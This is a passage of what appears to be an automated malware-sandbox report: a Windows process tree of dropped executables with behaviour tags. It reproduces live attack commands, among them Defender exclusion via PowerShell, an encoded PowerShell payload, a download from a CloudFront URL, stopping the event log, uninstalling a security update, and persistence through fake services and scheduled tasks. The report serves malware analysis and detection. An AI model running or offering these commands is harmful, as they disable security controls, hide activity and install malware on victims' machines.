10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=E5444D30E377EB2AE4F120435E836C99 --renderer-client-id=2 --mojo-platform-channel-handle=1736 --allow-no-sandbox-job /prefetch:15⤵PID:7324
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=2DF0931F21BBCF253B341D049C31069C --mojo-platform-channel-handle=1904 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵PID:7388
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=EAF574A66DCB6520AA0E40C899D27978 --mojo-platform-channel-handle=2312 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵PID:1052
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=F5DAF67A40D6BDF4EA6C84D456BC0C72 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=F5DAF67A40D6BDF4EA6C84D456BC0C72 --renderer-client-id=5 --mojo-platform-channel-handle=1976 --allow-no-sandbox-job /prefetch:15⤵PID:3964
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=4163D7B377DB2D1829A4E47DA9E53303 --mojo-platform-channel-handle=2816 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵PID:3376
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=D105695014EB621DAFEE8EE305A1E38F --mojo-platform-channel-handle=1988 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵PID:6608
-
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=165140434⤵PID:7092
-
-
-
C:\Users\Admin\AppData\Local\Temp\SIG.EXE"C:\Users\Admin\AppData\Local\Temp\SIG.EXE"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
PID:5488 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:6928
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\alabi.exe"C:\Users\Admin\AppData\Local\Temp\a\alabi.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:6476
-
-
C:\Users\Admin\AppData\Local\Temp\a\crt.exe"C:\Users\Admin\AppData\Local\Temp\a\crt.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:5168 -
C:\Users\Admin\AppData\Local\Temp\is-FUVD6.tmp\crt.tmp"C:\Users\Admin\AppData\Local\Temp\is-FUVD6.tmp\crt.tmp" /SL5="$10260,5149750,54272,C:\Users\Admin\AppData\Local\Temp\a\crt.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:6896 -
C:\Users\Admin\AppData\Local\Sounder Midi Player\soundermidiplayer.exe"C:\Users\Admin\AppData\Local\Sounder Midi Player\soundermidiplayer.exe" -i4⤵
- Executes dropped EXE
PID:5500
-
-
C:\Users\Admin\AppData\Local\Sounder Midi Player\soundermidiplayer.exe"C:\Users\Admin\AppData\Local\Sounder Midi Player\soundermidiplayer.exe" -s4⤵
- Executes dropped EXE
PID:3456
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\oiii.exe"C:\Users\Admin\AppData\Local\Temp\a\oiii.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
PID:860 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c takeown /f "C:\Program Files\Windows Media Player\wmpnetwk.exe" && icacls "C:\Program Files\Windows Media Player\wmpnetwk.exe" /grant administrators:F3⤵PID:7440
-
C:\Windows\system32\takeown.exetakeown /f "C:\Program Files\Windows Media Player\wmpnetwk.exe"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:6332
-
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Windows Media Player\wmpnetwk.exe" /grant administrators:F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:6156
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c sc create "Accecss Auto Connetcion Manager" binPath= "C:\Program Files\Windows Media Player\wmixedwk.exe" START= auto DISPLAYNAME= "WebServer" TYPE= own3⤵PID:7928
-
C:\Windows\system32\sc.exesc create "Accecss Auto Connetcion Manager" binPath= "C:\Program Files\Windows Media Player\wmixedwk.exe" START= auto DISPLAYNAME= "WebServer" TYPE= own4⤵
- Launches sc.exe
PID:4384
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\kkxqbh.bat" "3⤵PID:4980
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 34⤵
- Runs ping.exe
PID:7108
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\conhost.exe"C:\Users\Admin\AppData\Local\Temp\a\conhost.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
PID:6316 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"3⤵PID:4424
-
C:\Windows\system32\mode.commode 65,104⤵PID:6604
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e file.zip -p563741341569714296105326100 -oextracted4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:5136
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_2.zip -oextracted4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:6800
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_1.zip -oextracted4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:6668
-
-
C:\Windows\system32\attrib.exeattrib +H "svcshost.exe"4⤵
- Views/modifies file attributes
PID:1804
-
-
C:\Users\Admin\AppData\Local\Temp\main\svcshost.exe"svcshost.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3272 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C powershell -EncodedCommand "PAAjADcARABsAEoAZgBhACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAQwBVAFIARAA1AGwAcQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwAxAEsAZABHACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAagA4AGgAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off5⤵PID:2432
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjADcARABsAEoAZgBhACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAQwBVAFIARAA1AGwAcQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwAxAEsAZABHACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAagA4AGgAIwA+AA=="6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5560
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"5⤵PID:4712
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk6651" /TR "C:\ProgramData\Dllhost\dllhost.exe"5⤵PID:3008
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk6651" /TR "C:\ProgramData\Dllhost\dllhost.exe"6⤵
- Creates scheduled task(s)
PID:5816
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\sdf34ert3etgrthrthfghfghjfgh.exe"C:\Users\Admin\AppData\Local\Temp\a\sdf34ert3etgrthrthfghfghjfgh.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:6644 -
C:\Users\Admin\AppData\Local\Temp\katD433.tmpC:\Users\Admin\AppData\Local\Temp\katD433.tmp3⤵
- Executes dropped EXE
PID:7472
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\o2i3jroi23joj23ikrjokij3oroi.exe"C:\Users\Admin\AppData\Local\Temp\a\o2i3jroi23joj23ikrjokij3oroi.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3776 -
C:\Users\Admin\AppData\Local\Temp\katDA1F.tmpC:\Users\Admin\AppData\Local\Temp\katDA1F.tmp3⤵
- Executes dropped EXE
PID:2248
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\inte.exe"C:\Users\Admin\AppData\Local\Temp\a\inte.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
PID:5268 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "inte.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\a\inte.exe" & exit3⤵PID:4376
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "inte.exe" /f4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:7048
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\vpn-1002.exe"C:\Users\Admin\AppData\Local\Temp\a\vpn-1002.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5328 -
C:\Windows\SysWOW64\cmd.exe"cmd" /c "C:\Users\Admin\AppData\Local\Temp\nseDB3A.tmp\abc.bat"3⤵PID:7608
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object Net.WebClient).DownloadFile('https://d22hce23hy1ej9.cloudfront.net/load/th.php?a=2836&c=1002','stat')"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:7488
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\tdrpload.exe"C:\Users\Admin\AppData\Local\Temp\a\tdrpload.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
PID:4568 -
C:\Windows\sysblardsv.exeC:\Windows\sysblardsv.exe3⤵
- Modifies security service
- Windows security bypass
- Executes dropped EXE
- Windows security modification
PID:368 -
C:\Users\Admin\AppData\Local\Temp\270914205.exeC:\Users\Admin\AppData\Local\Temp\270914205.exe4⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
PID:6772 -
C:\Windows\syslmgrsvc.exeC:\Windows\syslmgrsvc.exe5⤵
- Modifies security service
- Windows security bypass
- Executes dropped EXE
- Windows security modification
- Suspicious behavior: SetClipboardViewer
PID:7484 -
C:\Users\Admin\AppData\Local\Temp\744220930.exeC:\Users\Admin\AppData\Local\Temp\744220930.exe6⤵
- Executes dropped EXE
PID:3328
-
-
C:\Users\Admin\AppData\Local\Temp\1679313164.exeC:\Users\Admin\AppData\Local\Temp\1679313164.exe6⤵
- Executes dropped EXE
PID:7860
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\2328932319.exeC:\Users\Admin\AppData\Local\Temp\2328932319.exe4⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
PID:6192 -
C:\Windows\winqlsdrvcs.exeC:\Windows\winqlsdrvcs.exe5⤵
- Windows security bypass
- Executes dropped EXE
- Windows security modification
PID:216 -
C:\Users\Admin\AppData\Local\Temp\2466314816.exeC:\Users\Admin\AppData\Local\Temp\2466314816.exe6⤵
- Executes dropped EXE
PID:4328
-
-
C:\Users\Admin\AppData\Local\Temp\1202339053.exeC:\Users\Admin\AppData\Local\Temp\1202339053.exe6⤵
- Executes dropped EXE
PID:6728
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1346524297.exeC:\Users\Admin\AppData\Local\Temp\1346524297.exe4⤵
- Executes dropped EXE
PID:6208 -
C:\Users\Admin\AppData\Local\Temp\Windows Security Upgrade Service.exe"C:\Users\Admin\AppData\Local\Temp\Windows Security Upgrade Service.exe"5⤵
- Executes dropped EXE
PID:760
-
-
-
C:\Users\Admin\AppData\Local\Temp\2269015714.exeC:\Users\Admin\AppData\Local\Temp\2269015714.exe4⤵
- Executes dropped EXE
PID:6424
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\print.exe"C:\Users\Admin\AppData\Local\Temp\a\print.exe"2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:7136 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 03⤵PID:6104
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 03⤵PID:2980
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 03⤵PID:6456
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 03⤵PID:7968
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"3⤵
- Launches sc.exe
PID:5760
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"3⤵
- Launches sc.exe
PID:7588
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog3⤵
- Launches sc.exe
PID:6164
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"3⤵
- Launches sc.exe
PID:2648
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\222.exe"C:\Users\Admin\AppData\Local\Temp\a\222.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
PID:1420 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"3⤵PID:7316
-
C:\Windows\system32\mode.commode 65,104⤵PID:7616
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e file.zip -p209313910271864811381312692 -oextracted4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2556
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_8.zip -oextracted4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:7756
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_7.zip -oextracted4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:6008
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_6.zip -oextracted4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5916
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_5.zip -oextracted4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5216
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_4.zip -oextracted4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4476
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_3.zip -oextracted4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:7628
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_2.zip -oextracted4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:7216
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_1.zip -oextracted4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5256
-
-
C:\Windows\system32\attrib.exeattrib +H "Installer.exe"4⤵
- Views/modifies file attributes
PID:7580
-
-
C:\Users\Admin\AppData\Local\Temp\main\Installer.exe"Installer.exe"4⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:6256 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force5⤵
- Command and Scripting Interpreter: PowerShell
PID:1168
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart5⤵PID:5096
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart6⤵PID:5300
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 05⤵PID:5992
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 05⤵PID:5160
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 05⤵PID:8032
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 05⤵PID:1596
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "OARKQOLE"5⤵
- Launches sc.exe
PID:3464
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "OARKQOLE" binpath= "C:\ProgramData\xiyorhiuewkj\adwmbjfsmbak.exe" start= "auto"5⤵
- Launches sc.exe
PID:7876
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog5⤵
- Launches sc.exe
PID:1456
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "OARKQOLE"5⤵
- Launches sc.exe
PID:5816
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\Pirate_24S.exe"C:\Users\Admin\AppData\Local\Temp\a\Pirate_24S.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
PID:7432 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.vbs"3⤵
- Checks computer location settings
PID:6672 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.cmd" "4⤵PID:7524
-
C:\Windows\system32\reg.exeC:\Windows\Sysnative\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ProductName5⤵PID:5468
-
-
C:\Windows\SysWOW64\find.exefind /i "Windows 7"5⤵PID:2952
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\client.exe"C:\Users\Admin\AppData\Local\Temp\a\client.exe"2⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:8168 -
C:\Windows\system32\Client.exe"C:\Windows\system32\Client.exe"3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1680
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\reverse.exe"C:\Users\Admin\AppData\Local\Temp\a\reverse.exe"2⤵
- Executes dropped EXE
PID:2144
-
-
C:\Users\Admin\AppData\Local\Temp\a\64.exe"C:\Users\Admin\AppData\Local\Temp\a\64.exe"2⤵
- Executes dropped EXE
PID:5504 -
C:\Windows\SYSTEM32\cmd.execmd3⤵PID:2820
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4436 -ip 44361⤵PID:2780
-
C:\Windows\system32\SearchIndexer.exeC:\Windows\system32\SearchIndexer.exe /Embedding1⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:756 -
C:\Windows\system32\SearchProtocolHost.exe"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe1_ Global\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"2⤵
- Modifies data under HKEY_USERS
PID:4544
-
-
C:\Windows\system32\SearchFilterHost.exe"C:\Windows\system32\SearchFilterHost.exe" 0 800 804 812 8192 808 7842⤵
- Modifies data under HKEY_USERS
PID:3224
-
-
C:\Program Files\Windows Media Player\wmpnetwk.exe"C:\Program Files\Windows Media Player\wmpnetwk.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:6412
-
C:\Program Files\Windows Media Player\wmixedwk.exe"C:\Program Files\Windows Media Player\wmixedwk.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:5892 -
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe2⤵
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
PID:6880 -
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"3⤵
- Drops file in System32 directory
- Drops file in Program Files directory
PID:5488
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"3⤵
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:1196
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"3⤵
- Drops file in System32 directory
- Drops file in Program Files directory
PID:7936
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"3⤵
- Drops file in Program Files directory
PID:7616
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"3⤵
- Drops file in Program Files directory
PID:7700
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"3⤵
- Drops file in Program Files directory
PID:6908
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"3⤵
- Drops file in Program Files directory
PID:3744
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"3⤵
- Drops file in Program Files directory
PID:4580
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"3⤵
- Drops file in Program Files directory
PID:7856
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"3⤵
- Drops file in Program Files directory
PID:1680
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"3⤵
- Drops file in Program Files directory
PID:5996
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"3⤵
- Drops file in Program Files directory
PID:8136
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"3⤵
- Drops file in Program Files directory
PID:7576
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"3⤵
- Drops file in System32 directory
- Drops file in Program Files directory
PID:3736
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"3⤵
- Drops file in Program Files directory
PID:6728
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"3⤵
- Drops file in Program Files directory
PID:5828
-
-
